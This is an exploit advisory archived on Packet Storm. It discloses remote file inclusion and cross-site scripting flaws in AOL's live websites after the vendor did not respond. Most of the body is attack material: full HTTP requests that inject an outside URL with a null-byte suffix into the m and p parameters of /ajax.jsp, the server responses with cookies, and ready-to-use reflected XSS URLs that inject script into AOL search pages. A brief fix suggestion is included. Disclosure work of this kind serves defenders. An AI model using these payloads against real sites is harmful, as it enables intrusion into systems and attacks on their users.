the original cloud security

AOL File Inclusion / Cross Site Scripting

AOL File Inclusion / Cross Site Scripting
Posted Jan 22, 2014
Authored by Juan Carlos Garcia

America Online (AOL) suffers from cross site scripting and remote file inclusion vulnerabilities.

tags | exploit, remote, vulnerability, code execution, xss, file inclusion
MD5 | 0d9462b1f15af5ece7e02a57bd97dabc

AOL File Inclusion / Cross Site Scripting

Change Mirror Download

AOL File Inclusion / Cross Site ScrIpting
*******************************


Time-Line vulnerability
------------------------

-Multiples Security Advisories

-Not Response

-Not FeedBack

-Not Fixed

-Another Security Advisory ( & another..)

-Not Response-Not FeedBack

-Full Disclosure


I. VULNERABILITY
-------------------------

#Title: AOL File Inclusion / Cross Site Scrpting

#Vendor:http://www.aol.com

#Author: Juan Carlos García (@secnight)
#Author: Francisco Moraga (@btshell)

www.asap-sec.com



II. DESCRIPTION
-------------------------

AOL Inc. (previously known as America Online, written as AOL and styled as "Aol." but commonly pronounced as an initialism) is an American multinational mass media corporation based in New York City that develops, grows, and invests in brands and web sites.
The company's business spans digital distribution of content, products, and services, which it offers to consumers,publishers, and advertisers.

Founded in 1983 as Control Video Corporation, an online services company by Jim Kimsey from the remnants of Control Video Corporation, AOL has franchised its services to companies in several nations around the world or to set up international versions of its services.AOL is headquartered at 770 Broadway in New York..


(Wikipedia)

III-Proof Of Concept
------------------


Remote File Inclusion
*******************


Vulnerability description
---------------------------


This script is vulnerable to file inclusion attacks.

It seems that this script includes a file which name is determined using user-supplied data.

This data is not properly validated before being passed to the include function.



Affected items
----------------

/ajax.jsp (5)


The impact of this vulnerability
--------------------------------
It is possible for a remote attacker to include a file from local or remote resources and/or
execute arbitrary script code with the privileges of the web-server.


How to fix this vulnerability
------------------------------
Edit the source code to ensure that input is properly validated. Where is possible, it is recommended to make a list of accepted filenames and restrict the input to that list.


Attack details
-----------------

URL encoded GET input m was set to http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

Error message found:

The requested resource (/aol/main/modules/http://some-inexistent-website.acu/some_inexistent_file_with_long_name) is not available

GET /ajax.jsp?ajax=1&cv=6&dlItem=432572&m=http%3a%2f%2fsome-inexistent-website.acu%2fsome_inexistent_file_with_long_name%3f%2500.jpg&offset=0&p=dynamicleadslide&sitHot=&slot=dynamiclead&vbclass=vid_over&vcslot=dynamiclead-video-
config&_c=main5 HTTP/1.1

Referer: http://www.aol.com:80/

Cookie: tst=%2C51%2Cs391a%3A%2C52%2Cs392a%3A%2C49%2Cs393a%3A%2C48%2Cs394a%3A%2C42%2Cs395a%3A%2C44%2Cs396a%3A%2C40%2Cs397a%3A%2C33%2Cs398a%3A%2C35%2Cs399a%3A%2C35%2Cs400a%3A%2C31%2Cs401a%3A%2C31%2Cs402a%3A%2C5%2Cs403a%3A%2C6%2Cs404a;

s_vi=[CS]v1|296F251E051D31A7-4000013680000AE1[CE]; UNAUTHID=1.c0be723094434eff9d2200121277667c.7cb9; CUNAUTHID=1.c0be723094434eff9d2200121277667c.7cb9; tsto=; molhp=; mtmhp_ncid_icid=?xicid=acm50mtmhppromorc; mol=; favftux=true;

JSESSIONID=; aolweatherlocation=91744; uauserid=cdb4b64f-04d8-499f-ac25-b16f159b066b; reclocs=V1|La%2BPuente%252C%2BCA%257CLa%2BPuente%252CLos%2BAngeles%2BCounty%2BCounty%252CCA%252891744%2529%253B91744%257CLa%2BPuente%252CCA%252891744%2529%253BCity%252C%2BState%2Bor%2BZIP%2BPlease%2521%257CCity%2BOf%2BIndustry%252CLos%2BAngeles%2BCounty%2BCounty%252CCA%252891744%2529; s_sess=%20s_sq%3D%3B; s_pers=%20s_nrgvo%3DNew%7C1453371978408%3B;rrpmo1=rr1~2~1390299741293~0; dlact=dl1; tzoffset=V1|js_1; stips5=main5-local; tips5=favorites getstart:-1; oldArticles=oldArts%3D%5B%5D


Response


HTTP/1.1 200 OK

Set-Cookie: RSP_CHECK_PORTAL_STARTPAGE.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=www.aol.com

Set-Cookie: RSP_CHECK_PORTAL_STARTPAGE.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/

Set-Cookie: RSP_CHECK_PORTAL_STARTPAGE.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=aol.com

x-ua-compatible: IE=EmulateIE9

Pragma: no-cache

Cache-Control: no-cache, no-store, private, max-age=0

Expires: 0

Content-Type: text/javascript;charset=UTF-8

Content-Length: 130

Set-Cookie: JSESSIONID=C08A9752C9DF6FE072CF35073B14F824; Path=/aol

Set-Cookie: JSESSIONID=; Domain=aol.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive




Variant 1
-----------

URL encoded GET input m was set to http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

Error message found:

The requested resource (/aol/main/modules/http://some-inexistent-website.acu/some_inexistent_file_with_long_name) is not available


Request

GET /ajax.jsp?ajax=1&cv=6&dlItem=432572&m=http%3a%2f%2fsome-inexistent-website.acu%2fsome_inexistent_file_with_long_name%3f%2500.jpg&offset=0&p=dynamicleadslide&sitHot=&slot=dynamiclead&vbclass=vid_over&vcslot=dynamiclead-video-
config&_c=main5 HTTP/1.1

Referer: http://www.aol.com:80/

Cookie: tst=%2C51%2Cs391a%3A%2C52%2Cs392a%3A%2C49%2Cs393a%3A%2C48%2Cs394a%3A%2C42%2Cs395a%3A%2C44%2Cs396a%3A%2C40%2Cs397a%3A%2C33%2Cs398a%3A%2C35%2Cs399a%3A%2C35%2Cs400a%3A%2C31%2Cs401a%3A%2C31%2Cs402a%3A%2C5%2Cs403a%3A%2C6%2Cs404a;

s_vi=[CS]v1|296F251E051D31A7-4000013680000AE1[CE]; UNAUTHID=1.c0be723094434eff9d2200121277667c.7cb9; CUNAUTHID=1.c0be723094434eff9d2200121277667c.7cb9; tsto=; molhp=; mtmhp_ncid_icid=?xicid=acm50mtmhppromorc; mol=; favftux=true;

JSESSIONID=; aolweatherlocation=91744; uauserid=cdb4b64f-04d8-499f-ac25-b16f159b066b; reclocs=V1|La%2BPuente%252C%2BCA%257CLa%2BPuente%252CLos%2BAngeles%2BCounty%2BCounty%252CCA%252891744%2529%253B91744%257CLa%2BPuente%252CCA

%252891744%2529%253BCity%252C%2BState%2Bor%2BZIP%2BPlease%2521%257CCity%2BOf%2BIndustry%252CLos%2BAngeles%2BCounty%2BCounty%252CCA%252891744%2529; s_sess=%20s_sq%3D%3B; s_pers=%20s_nrgvo%3DNew%7C1453371978408%3B;

rrpmo1=rr1~2~1390299741293~0; dlact=dl1; tzoffset=V1|js_1; stips5=main5-local; tips5=favorites getstart:-1; oldArticles=oldArts%3D%5B%5D


Response

HTTP/1.1 200 OK

Set-Cookie: RSP_CHECK_PORTAL_STARTPAGE.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=www.aol.com

Set-Cookie: RSP_CHECK_PORTAL_STARTPAGE.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/

Set-Cookie: RSP_CHECK_PORTAL_STARTPAGE.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=aol.com

x-ua-compatible: IE=EmulateIE9

Pragma: no-cache

Cache-Control: no-cache, no-store, private, max-age=0

Expires: 0

Content-Type: text/javascript;charset=UTF-8

Content-Length: 130

Set-Cookie: JSESSIONID=C08A9752C9DF6FE072CF35073B14F824; Path=/aol

Set-Cookie: JSESSIONID=; Domain=aol.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive


Variant 3
---------

URL encoded GET input p was set to http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

Error message found:

The requested resource (/aol/main/modules/dynamiclead/http://some-inexistent-website.acu/some_inexistent_file_with_long_name) is not available


Request

GET /ajax.jsp?ajax=1&cv=6&dlItem=432572&m=dynamiclead&offset=0&p=http%3a%2f%2fsome-inexistent-website.acu%2fsome_inexistent_file_with_long_name%3f%2500.jpg&sitHot=&slot=dynamiclead&vbclass=vid_over&vcslot=dynamiclead-video-
config&_c=main5 HTTP/1.1

Referer: http://www.aol.com:80/

Cookie:

tst=%2C51%2Cs391a%3A%2C52%2Cs392a%3A%2C49%2Cs393a%3A%2C48%2Cs394a%3A%2C42%2Cs395a%3A%2C44%2Cs396a%3A%2C40%2Cs397a%3A%2C33%2Cs398a%3A%2C35%2Cs399a%3A%2C35%2Cs400a%3A%2C31%2Cs401a%3A%2C31%2Cs402a%3A%2C5%2Cs403a%3A%2C6%2Cs404a;

s_vi=[CS]v1|296F251E051D31A7-4000013680000AE1[CE]; UNAUTHID=1.c0be723094434eff9d2200121277667c.7cb9; CUNAUTHID=1.c0be723094434eff9d2200121277667c.7cb9; tsto=; molhp=; mtmhp_ncid_icid=?xicid=acm50mtmhppromorc; mol=; favftux=true;

JSESSIONID=; aolweatherlocation=91744; uauserid=cdb4b64f-04d8-499f-ac25-b16f159b066b; reclocs=V1|La%2BPuente%252C%2BCA%257CLa%2BPuente%252CLos%2BAngeles%2BCounty%2BCounty%252CCA%252891744%2529%253B91744%257CLa%2BPuente%252CCA%252891744%2529%253BCity%252C%2BState%2Bor%2BZIP%2BPlease%2521%257CCity%2BOf%2BIndustry%252CLos%2BAngeles%2BCounty%2BCounty%252CCA%252891744%2529; s_sess=%20s_sq%3D%3B; s_pers=%20s_nrgvo%3DNew%7C1453371978408%3B;rrpmo1=rr1~2~1390299741293~0; dlact=dl1; tzoffset=V1|js_1; stips5=main5-local; tips5=favorites getstart:-1; oldArticles=oldArts%3D%5B%5D



Variant 4
---------

Attack details
----------------
URL encoded GET input p was set to http://some-inexistent website.acu/some_inexistent_file_with_long_name?%00.jpg

Error message found:

The requested resource (/aol/main/modules/dynamiclead/http://some-inexistent-website.acu/some_inexistent_file_with_long_name) is not available


GET /ajax.jsp?ajax=1&cv=6&dlItem=431789&m=dynamiclead&offset=0&p=http%3a%2f%2fsome-inexistentwebsite.acu%2fsome_inexistent_file_with_long_name%3f%2500.jpg&sitHot=&slot=dynamiclead&vbclass=vid_over&vcslot=dynamiclead-video-config&_c=main5

HTTP/1.1

Referer: http://www.aol.com:80/

Cookie: tst=%2C51%2Cs391a%3A%2C52%2Cs392a%3A%2C49%2Cs393a%3A%2C48%2Cs394a%3A%2C42%2Cs395a%3A%2C44%2Cs396a%3A%2C40%2Cs397a%3A%2C33%2Cs398a%3A%2C35%2Cs399a%3A%2C35%2Cs400a%3A%2C31%2Cs401a%3A%2C31%2Cs402a%3A%2C5%2Cs403a%3A%2C6%2Cs404a;

s_vi=[CS]v1|296F251E051D31A7-4000013680000AE1[CE]; UNAUTHID=1.c0be723094434eff9d2200121277667c.7cb9; CUNAUTHID=1.c0be723094434eff9d2200121277667c.7cb9; tsto=; molhp=; mtmhp_ncid_icid=?xicid=acm50mtmhppromorc; mol=; favftux=true;

JSESSIONID=; aolweatherlocation=91744; uauserid=cdb4b64f-04d8-499f-ac25-b16f159b066b; reclocs=V1|La%2BPuente%252C%2BCA%257CLa%2BPuente%252CLos%2BAngeles%2BCounty%2BCounty%252CCA%252891744%2529%253B91744%257CLa%2BPuente%252CCA%252891744%2529%253BCity%252C%2BState%2Bor%2BZIP%2BPlease%2521%257CCity%2BOf%2BIndustry%252CLos%2BAngeles%2BCounty%2BCounty%252CCA%252891744%2529; s_sess=%20s_sq%3D%3B; s_pers=%20s_nrgvo%3DNew%7C1453371978408%3B;rrpmo1=rr1~2~1390299741293~0; dlact=dl1; tzoffset=V1|js_1; stips5=main5-local; tips5=favorites getstart:-1; oldArticles=oldArts%3D%5B%5D


Response
----------
HTTP/1.1 200 OK

Cache-Control: max-age=5
Connection: Keep-Alive

Via: AOL-CACHE

x-ua-compatible: IE=EmulateIE9

Pragma: no-cache

test-timestamp: 1390300006644

Content-Type: text/javascript;charset=UTF-8

Content-Length: 142

Keep-Alive: timeout=5, max=100



Cross Site Scripting
*********************


http://search.aol.com/aol/webhome?s_chn=%3C/script%3E%3Cscript%3Ealert%28%22Secnight%20and%20BTshell%22%29;%3C/script%3E%3Cscript%3E


http://search.aol.co.uk/aol/webhome?s_chn=%3C%2Fscript%3E%3Cscript%3Ealert%28%22Secnight+and+BTshell+says..+Security+Advisory%3A+Not+FeedBack+Not+Response+Not+Fixed..+Full+Disclosure+asap-sec.com%22%29%3B%3C%2Fscript%3E%3Cscript%3E …


IV-Authors:
-----------
Juan Carlos García @secnight
Francisco Moraga @BTshell
ASAP Security As Soon As Possible

www-asap-sec.com

LEGAL NOTICES
--------------

The Authors accepts no responsibility for any damage caused by the use or misuse of this information.

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

July 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    2 Files
  • 2
    Jul 2nd
    3 Files
  • 3
    Jul 3rd
    15 Files
  • 4
    Jul 4th
    4 Files
  • 5
    Jul 5th
    15 Files
  • 6
    Jul 6th
    15 Files
  • 7
    Jul 7th
    10 Files
  • 8
    Jul 8th
    2 Files
  • 9
    Jul 9th
    10 Files
  • 10
    Jul 10th
    15 Files
  • 11
    Jul 11th
    15 Files
  • 12
    Jul 12th
    19 Files
  • 13
    Jul 13th
    16 Files
  • 14
    Jul 14th
    15 Files
  • 15
    Jul 15th
    3 Files
  • 16
    Jul 16th
    2 Files
  • 17
    Jul 17th
    8 Files
  • 18
    Jul 18th
    11 Files
  • 19
    Jul 19th
    15 Files
  • 20
    Jul 20th
    15 Files
  • 21
    Jul 21st
    15 Files
  • 22
    Jul 22nd
    7 Files
  • 23
    Jul 23rd
    2 Files
  • 24
    Jul 24th
    19 Files
  • 25
    Jul 25th
    28 Files
  • 26
    Jul 26th
    2 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close